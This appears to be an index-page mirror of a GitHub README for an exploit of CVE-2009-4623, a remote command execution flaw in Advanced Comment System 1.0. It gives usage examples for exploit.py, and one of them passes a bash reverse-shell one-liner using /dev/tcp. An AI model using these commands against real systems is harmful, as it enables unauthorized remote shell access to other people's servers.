An open API service indexing awesome lists of open source software.

https://github.com/hupe1980/cve-2009-4623

Advanced Comment System 1.0 - Remote Command Execution (RCE)
https://github.com/hupe1980/cve-2009-4623

cve-2009-4623

Last synced: 11 days ago
JSON representation

Advanced Comment System 1.0 - Remote Command Execution (RCE)

Awesome Lists containing this project

README

          

# Advanced Comment System 1.0 - Remote Command Execution (RCE)
> https://nvd.nist.gov/vuln/detail/CVE-2009-4623

## Examples
```bash
python3 exploit.py http://127.0.0.1 uname -a
```

```bash
python3 exploit.py http://127.0.0.1 'bash -i >& /dev/tcp/127.0.0.1/443 0>&1'
```